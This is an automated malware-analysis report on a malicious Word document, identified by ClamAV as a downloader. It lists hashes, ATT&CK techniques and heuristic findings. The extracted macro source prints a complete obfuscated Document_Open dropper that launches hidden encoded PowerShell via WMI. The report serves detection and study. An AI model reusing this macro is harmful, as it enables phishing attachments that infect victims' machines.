Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 857f916434fcf15c…

MALICIOUS

Office (OLE)

98.0 KB Created: 2020-03-06 13:57:00 Authoring application: Microsoft Office Word First seen: 2020-07-02
MD5: c9f6610daad3f3a3fc27d96b441910c3 SHA-1: 63b9ddf30f5ef03e1d477680cf92e56229bf3575 SHA-256: 857f916434fcf15c1cb2ded81bd5386a197341c1739b755a7a12e46135708045
272 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros that use the `GetObject` and `CreateObject` methods to launch `winmgmts` to create a `Win32_Process`. This is a critical heuristic indicating the execution of a malicious payload. The document body explicitly instructs the user to enable editing and content, a common social engineering tactic to bypass macro security. The presence of the `macros.bas` file and the ClamAV detection further support its malicious nature as a downloader.

Heuristics 9

  • ClamAV: Doc.Downloader.Generic-7611954-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7611954-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Sub Document_Open()
    Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
    Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA …
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Sub Document_Open()
    Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
    Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA …
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Sub Document_Open()
    Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
    Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA …
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
    Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13664 bytes
SHA-256: 413f36734d8696e1c82a5b3472bc635831309e4f47b635fff71212c450911a22
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub UserForm_Initialize()
    
    Call PopulaCombos
    
    Call EventosCampos
    
    Call BuscaRegistros

End Sub
Private Sub UserForm_Terminate()
    
    Set oLoja = Nothing
    Set myRst = Nothing
    
    Call Desconecta
    
End Sub
Private Sub btnIncluir_Click()
    
    Call PosDecisaoTomada("Inclusao")
    
End Sub
Private Sub btnAlterar_Click()
    
    Call PosDecisaoTomada("Alteracao")

End Sub
Private Sub btnExcluir_Click()

    Call PosDecisaoTomada("Exclusao")
    
End Sub
Private Sub PosDecisaoTomada(Decisao As String)

    btnCancelar.Visible = True: btnConfirmar.Visible = True
    btnConfirmar.Caption = "Confirmar " & Decisao
    btnCancelar.Caption = "Cancelar " & Decisao
    
    btnIncluir.Visible = False: btnAlterar.Visible = False: btnExcluir.Visible = False
    
    MultiPage1.Value = 1
    
    If Decisao <> "Exclusao" Then
    
        If Decisao = "Inclusao" Then
        
            Call Campos("Limpar")
            
        End If
        
        Call Campos("Habilitar")
        
        txbLoja.SetFocus
        
    End If
    
    MultiPage1.Pages(0).Enabled = False
    
End Sub
Private Sub btnConfirmar_Click()
    
    Call Gravar(Replace(btnConfirmar.Caption, "Confirmar ", ""))
    
End Sub
Private Sub btnCancelar_Click()
    
    btnIncluir.Visible = True: btnAlterar.Visible = True: btnExcluir.Visible = True
    btnConfirmar.Visible = False: btnCancelar.Visible = False
    
    Call Campos("Limpar")
    Call Campos("Desabilitar")
    
    btnAlterar.Enabled = False
    btnExcluir.Enabled = False
    btnIncluir.SetFocus
   
    MultiPage1.Value = 0
    
    lstPrincipal.ListIndex = -1 ' Tira a selecao
    
End Sub
Private Sub lstPrincipal_Change()

    Dim n As Long
    
    If lstPrincipal.ListIndex >= 0 Then
    
        btnAlterar.Enabled = True
        btnExcluir.Enabled = True
    
        With oLoja
    
            .CRUD eCrud.Read, (CLng(lstPrincipal.List(lstPrincipal.ListIndex, 1)))
    
            lblCabID.Caption = IIf(.ID = 0, "", Format(.ID, "000000"))
            lblCabLoja.Caption = .Loja
            txbLoja.Text = .Loja
            
        End With
        
    End If

End Sub
Private Sub Campos(Acao As String)
    
    Dim sDecisao    As String
    Dim b           As Boolean
    
    sDecisao = Replace(btnConfirmar.Caption, "Confirmar ", "")
    
    If Acao <> "Limpar" Then
    
        If Acao = "Desabilitar" Then
            b = False
        ElseIf Acao = "Habilitar" Then
            b = True
        End If
        
        MultiPage1.Pages(0).Enabled = Not b
        
        txbLoja.Enabled = b: lblLoja.Enabled = b
        
    Else
    
        lblCabID.Caption = ""
        lblCabLoja.Caption = ""
        txbLoja.Text = Empty
             
    End If

End Sub
Private Sub lstPrincipalPopular(Pagina As Long)

    Dim n           As Byte
    Dim vNascimento As Variant
    Dim vSalario    As Variant
    Dim oLegenda     As Control
    
    ' Limpa cores da legenda
    For n = 1 To myRst.PageSize
        Set oLegenda = Controls("l" & Format(n, "00")): oLegenda.BackColor = &H8000000F
    Next n

    ' Define pagina que sera exibida do Recordset
    myRst.AbsolutePage = Pagina
    
    With lstPrincipal
        .Clear                                      ' Limpa conteudo
        .ColumnCount = 2                            ' Define numero de colunas
        .ColumnWidths = "180 pt; 0pt;"              ' Configura largura das colunas
        .Font = "Consolas"                          ' Configura fonte
        
        n = 1
        
        While Not myRst.EOF = True And n <= myRst.PageSize
            
            ' Preenche ListBox
            .AddItem
            
            .List(.ListCount - 1, 0) = myRst.Fields("loja").Value
            .List(.ListCount - 1, 1) = myRst.Fields("id").Value
            
            ' Colore a legenda
'            Set oLegenda = Controls("l" & Format(n, "00"))
'
'            If myRst.Fields("sexo").Value = "F" Then
'                oLegenda.BackColor = &HFF80FF
'            ElseIf myRst.Fields("sexo").Value = "M" Then
'                oLegenda.BackColor = &HFF8080
'            Else
'                oLegenda.BackColor = &H8000000F
'            End If
            
            ' Proximo registro
            myRst.MoveNext: n = n + 1
            
        Wend
        
    End With
    
    ' Posiciona scroll de navegacao em paginas
    lblPaginaAtual.Caption = Pagina
    lblNumeroPaginas.Caption = myRst.PageCount
    bAtualizaScrool = False: scrPagina.Value = CLng(lblPaginaAtual.Caption): bAtualizaScrool = True
    lblTotalRegistros.Caption = Format(myRst.RecordCount, "#,##0")
    
    ' Trata os botoes de navegacao
    Call TrataBotoesNavegacao

End Sub
Private Sub Gravar(Decisao As String)

    Dim vbResposta  As VbMsgBoxResult
    Dim e           As eCrud
    
    vbResposta = MsgBox("Deseja realmente fazer a " & Decisao & "?", vbYesNo + vbQuestion, "Pergunta")
    
    If vbResposta = vbYes Then
    
        If Decisao <> "Exclusao" Then
        
            If txbLoja.Text = Empty Then
                MsgBox "Campo 'Loja' e obrigatorio", vbCritical: MultiPage1.Value = 1: txbLoja.SetFocus
            Else
                
                With oLoja
                    
                    .Loja = Replace(txbLoja.Text, "'", "`")
                    
                    If Decisao = "Inclusao" Then
                        .CRUD eCrud.Create
                    Else
                        .CRUD eCrud.Update, .ID
                    End If
                    
                End With
                
                MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
                
                Call BuscaRegistros
                                    
            End If
        
        Else ' Se for exclusao
        
            oLoja.CRUD eCrud.Delete, oLoja.ID
                
            MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
            
            Call BuscaRegistros
            
        End If
               
    ElseIf vbResposta = vbNo Then
        
        If Decisao = "Exclusao" Then
            
            Call btnCancelar_Click
            
        End If
        
    End If
    
End Sub
Private Sub EventosCampos()

    ' Declara variaveis
    Dim oControle   As MSForms.Control
    Dim oEvento     As c__EventoCampo
    Dim sTag        As String
    Dim sField()    As String
    
    ' Laco para percorrer todos os TextBox e atribuir eventos
    ' de acordo com o tipo de cada campo
    For Each oControle In Me.Controls
    
        If Len(oControle.Tag) > 0 Then
        
            If TypeName(oControle) = "TextBox" Then
            
                Set oEvento = New c__EventoCampo
                
                With oEvento
                
                    sField() = Split(oControle.Tag, ".")
                    
                    oControle.ControlTipText = cat.Tables(sField(0)).Columns(sField(1)).Properties("Description").Value
                    
                    .FieldType = cat.Tables(sField(0)).Columns(sField(1)).Type
                    .MaxLength = cat.Tables(sField(0)).Columns(sField(1)).DefinedSize
                    .Nullable = cat.Tables(sField(0)).Columns(sField(1)).Properties("Nullable")
                    
                    Set .cGeneric = oControle
                    
                End With
                
                colControles.Add oEvento
                
            End If
            
        End If
    Next

End Sub
Private Sub btnFiltrar_Click()

    Call BuscaRegistros

End Sub
Private Sub BuscaRegistros(Optional Ordem As String)

    Dim n As Byte
    Dim o As Control

    Set myRst = oLoja.Todos(Ordem, True)
    
    If myRst.PageCount > 0 Then
        
        bAtualizaScrool = False
        
        With scrPagina
            .Max = myRst.PageCount
            .Value = myRst.PageCount
        End With
        
        Call lstPrincipalPopular(myRst.PageCount)
        
    Else
    
        lstPrincipal.Clear
        
        For n = 1 To myRst.PageSize
            Set o = Controls("l" & Format(n, "00")): o.BackColor = &H8000000F
        Next n
        
    End If
    
    Call btnCancelar_Click
    

End Sub
Private Sub TrataBotoesNavegacao()

    If CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) > 1 Then
    
        btnPaginaInicial.Enabled = True
        btnPaginaAnterior.Enabled = True
        btnPaginaFinal.Enabled = False
        btnPaginaSeguinte.Enabled = False
        
    ElseIf CLng(lblPaginaAtual.Caption) < myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
    
        btnPaginaInicial.Enabled = False
        btnPaginaAnterior.Enabled = False
        btnPaginaFinal.Enabled = True
        btnPaginaSeguinte.Enabled = True
        
    ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
    
        btnPaginaInicial.Enabled = False
        btnPaginaAnterior.Enabled = False
        btnPaginaFinal.Enabled = False
        btnPaginaSeguinte.Enabled = False
    
    Else
    
        btnPaginaInicial.Enabled = True
        btnPaginaAnterior.Enabled = True
        btnPaginaFinal.Enabled = True
        btnPaginaSeguinte.Enabled = True
        
    End If

End Sub
Private Sub btnPaginaInicial_Click()
    
    Call lstPrincipalPopular(1)
    
End Sub
Private Sub btnPaginaAnterior_Click()

    Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
    
End Sub
Private Sub btnPaginaSeguinte_Click()

    Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)

End Sub
Private Sub btnPaginaFinal_Click()

    Call lstPrincipalPopular(myRst.PageCount)
    
End Sub
Private Sub btnRegistroAnterior_Click()

        If lstPrincipal.ListIndex > 0 Then
        
            lstPrincipal.ListIndex = lstPrincipal.ListIndex - 1
            
        ElseIf lstPrincipal.ListIndex = 0 And CLng(lblPaginaAtual.Caption) > 1 Then
            
            Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
            
            lstPrincipal.ListIndex = myRst.PageSize - 1
            
        ElseIf CLng(lblPaginaAtual.Caption) = 1 And lstPrincipal.ListIndex = 0 Then
        
            MsgBox "Primeiro registro"
            Exit Sub
            
        Else
        
            lstPrincipal.ListIndex = -1
            
        End If
        
End Sub
Private Sub btnRegistroSeguinte_Click()

    If lstPrincipal.ListIndex = -1 Then
        
        lstPrincipal.ListIndex = 0
    
    ElseIf lstPrincipal.ListIndex = myRst.PageSize - 1 And CLng(lblPaginaAtual.Caption) < myRst.PageCount Then
        
        Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)
        
        lstPrincipal.ListIndex = 0
        
    ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And (lstPrincipal.ListIndex + 1) = lstPrincipal.ListCount Then
    
        MsgBox "Ultimo registro"
        Exit Sub
        
    Else
    
        lstPrincipal.ListIndex = lstPrincipal.ListIndex + 1
    
    End If
    
End Sub
Private Sub scrPagina_Change()

    If bAtualizaScrool = True Then
        
        Call lstPrincipalPopular(scrPagina.Value)
        
    End If

End Sub
Private Sub PopulaCombos()

'    With cbbSexo
'        .Clear
'        .ColumnCount = 2
'        .ColumnWidths = "60pt; 0pt;"
'
'        .AddItem
'        .List(.ListCount - 1, 0) = "MASCULINO"
'        .List(.ListCount - 1, 1) = "M"
'
'        .AddItem
'        .List(.ListCount - 1, 0) = "FEMININO"
'        .List(.ListCount - 1, 1) = "F"
'    End With

End Sub
Private Sub lstPrincipal_DblClick(ByVal Cancel As String)

    MultiPage1.Value = 1
    
End Sub
Private Sub lblHdNome_Click()

    Call BuscaRegistros("loja")
    
End Sub

Sub Document_Open()
Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBAdAEGAuBQaAQHAzBQZAQEA" + "tAAIAQHAhBAZA4CAlBQWAAHARBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBALAQHAhBAZA4CArBgSAEGAlBgbA8CAlBAdAkGAzBgLAYDAwBgcA8GAjBwLA8CA6AAc" + "AQHA0BAaAwCA0BQYAQGAuAQZAoGABBQdAUGAJBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBAIAUGAjBgcAUHAvBwUA0" + "CAgAgcAUGAmBwcA4GAhBgcAQFAzBAdAkGACBQLAQHAyBQYAQHATBAIAsDAyBQZ" + "AYGAzBgbAEGAyBAVAMHA0BQaAIEA" + "gAQZAwGA1BAZA8GANBQLAQHAyBwbAAHAtBQS ne- neddih elytswodniw- llehsrewop"), Null, Null, TerfajK)

End Sub